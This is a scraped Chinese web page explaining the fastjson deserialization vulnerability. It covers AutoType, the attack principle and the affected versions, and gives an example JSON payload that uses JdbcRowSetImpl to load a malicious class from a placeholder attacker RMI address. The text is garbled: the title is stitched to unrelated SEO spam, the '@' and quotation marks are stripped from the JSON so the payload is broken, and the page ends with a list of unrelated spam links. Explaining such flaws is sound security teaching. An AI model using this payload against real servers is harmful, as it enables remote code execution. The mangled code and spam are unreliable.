当前位置: 首页 > news >正文

怎么做php网站深圳做网站建设和维护专员管理层

怎么做php网站,深圳做网站建设和维护专员管理层,广州做网站公司哪家比较好,快速建站的模板fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式#xff0c;也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化#xff0c;AutoType使用type标记字符的原始类型#x… fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化AutoType使用type标记字符的原始类型在反序列话时会读取type以此把内容反序列化到对象在上述过程中会调用到库中的setter和getter方法 攻击原理 攻击者传入一个恶意构造的json内容程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数进而促使恶意代码执行 合理构造一个JSON使用type指定一个想要攻击的类库就可以实现攻击 补充 仅影响Fastjson1.2.24及之前版本 例子 {b: {type: com.sun.rowset.JdbcRowSetImpl,dataSourceName: rmi://攻击者的IP地址/恶意类,autoCommit: true}JSON 数据包这里展示的 JSON 数据包包含一个名为 b 的对象其中有一个 type 字段指定了这个对象的类型为 com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。恶意数据在 dataSourceName 字段中提供了一个远程方法调用 (RMI) 的 URL指向攻击者的 IP 地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。自动提交autoCommit 字段被设置为 true表明在反序列化后自动执行某些操作。
http://www.hkea.cn/news/14338709/

相关文章:

  • 潍坊seo建站谷歌优化技术
  • 企业管理的官方网站有哪些流感用什么药最好
  • 专做民宿预定的网站大兴模版网站开发公司哪家好
  • 您的网站对百度设置了ua封禁z怎么解决wordpress自动轮播图插件
  • 麻城网站建设公司虚拟商城平台
  • 网络推广网站套餐付网站建设费用会计分录
  • 展示型网站都包括什么模块专业模板网站设计公司
  • 网站建设登录页面怎么写wordpress菜单用处
  • 珠海市网站建设哪家好wordpress启动广告
  • 做网站的软件项目进度计划互联网营销渠道有哪些
  • 餐饮品牌设计网站建设男孩子怎么做网站
  • 江苏省 建设 注册中心网站wordpress seo优化插件
  • 只买域名不建网站网络科技公司有什么职位
  • wordpress中有趣的插件太原关键词优化服务
  • 淄博网站建设多太原网页设计师招聘信息
  • 营销型企业网站建设规划探讨discuz轉wordpress
  • 网站建设创新有哪些品牌做打底衫的网站
  • 如何在网站做引流今天最新的新闻头条新闻
  • 网站建设的企业泉州市做网站优化
  • 庄辉个人网站建设教学兰州装修公司排名前十强
  • 十大网站平台wordpress v4.1教程
  • 网站设计 用户心理研究app开发成本预算表
  • 曲周企业做网站推广青岛工程建设管理信息网官方网站
  • 建设ipv6网站wordpress 时间函数
  • 自己建服务器做网站违法开发运营一个app要多少钱
  • 网页美工是什么优化网站内容的方法
  • 织梦网站0day漏洞国外最大的设计网站有哪些方面
  • 海洋网站建设公司合肥网站制作公司排名
  • 平谷网站建设静态网站模板下载
  • 减肥网站开发目的防城港做网站